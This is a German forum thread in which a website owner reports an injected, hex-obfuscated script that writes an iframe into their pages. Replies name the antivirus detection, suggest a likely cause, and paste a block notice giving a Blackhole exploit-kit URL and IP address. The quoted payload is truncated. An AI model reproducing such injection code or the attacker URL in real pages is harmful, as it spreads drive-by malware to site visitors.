Scriptvirus auf der eigenen Website

Dieses Thema im Forum "PC" wurde erstellt von intercorni, 22. Juli 2011.

  1. intercorni

    intercorni |||||

    Ein Kollege hat mich darauf aufmerksam gemacht, dass er beim Aufruf meiner Website eine Warnung vom Virenscanner erhält.
    Danach habe ich mir den HTML Code angesehen und erstaunt einen Eintrag festgestellt, der mit großer Wahrscheinlichkeit
    hinzugefügt wurde, jedoch nicht von mir:

    Code:
    <script>var t="";var arr="646f63756d656e742e777269746528273c696672 ...
    Wie kann soetwas passieren? Ich bin gerade etwas entsetzt.
     
  2. Ja. Kaspersky sperrt hier gar den Zugriff auf die Seite. Trojan-Downloader.JS.Iframe.chf heisst der Schädling bei denen.

    Höchstwahrscheinlich durch eine Schwachstelle im Webserver (oder Erweiterungen wie PHP) oder einem CMS (falls sowas eingesetzt wird).
    Wie der Angriffsvektor genau verlief, kann nur der Betreiber des Servers herausfinden.
     
  3. Cyborg

    Cyborg ..

    Schmeiß zuerst mal die ungefragt abgespielte Musik raus, sowas hat man vielleicht vor 20 Jahren toll gefunden. Wenn schon automatische Medien, dann sollten sie einfach abschaltbar sein.

    --- EINDRINGVERSUCH VON ANDREWCHEN.US [78.111.51.100, 80) WURDE BLOCKIERT ---
    __ BLACKHOLE TOOLKIT WEBSITE 5 __

    ANGREIFER-URL: andrewchen.us/forum.php?tp=9b129b234e593d76

    Wo hast Du denn Deine Website gespeichert, dass sowas läuft?
     
  4. intercorni

    intercorni |||||

    Naja die Website ist ja dazu da um die Musik zu präsentieren. Und stoppen kann man diese, in dem man den Stop Button oben im Player betätigt.
    Gehostet habe ich bei www.all-inkl.com
    PHP nutze ich nur für das Mailformular.